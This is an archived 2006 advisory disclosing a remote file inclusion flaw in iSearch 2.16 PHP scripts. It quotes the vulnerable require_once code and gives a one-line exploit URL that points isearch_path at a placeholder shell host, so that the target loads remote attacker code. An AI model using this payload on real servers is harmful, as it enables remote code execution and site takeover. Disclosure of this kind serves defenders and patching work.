The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit

2006-10-09T00:00:00
ID SECURITYVULNS:DOC:14593
Type securityvulns
Reporter Securityvulns
Modified 2006-10-09T00:00:00

Description

=======================================================================

=======================

The latest version of iSearch is V2.16 <= (index.php) Remote File Inclusion Exploit

=======================================================================

========================

Bug in :index.php & viewcache.php & sitemapphp& isearch.inc.php & google_sitemap.php&

stats.php & auto_spider_img.php

Vlu Code :

--------------------------------

require_once "$isearch_path/inc/core.inc.php";

require_once "$isearch_path/inc/search.inc.php";

=======================================================================

=========================

Exploit :

--------------------------------

htpp://sitename.com/[scerpitPath]/index.php?isearch_path=http://SHELLURL.COM

=======================================================================

=========================

Discoverd By : MoHaNdKo

Conatact : xp1o (at) msn (dot) com [email concealed]

or

wWw.xP10.CoM & wWw.TRyaG.CoM

Greetz :ToOoFA &( abo nora ) & 3abdalah & KaBaRa & mahmood_ali & ThE-WoLf-KsA & abu shad & v1per-haCker & MR.WOLF &

abu melaf & mohagr22 & metoovet & fuck_net & hitler-jeddah & El3alMy &

and all member on xp10.com and tryag.com and lezr.com

========================================================================

vendor:

http://www.isearchthenet.com/isearch/download/isearch_2_16.zip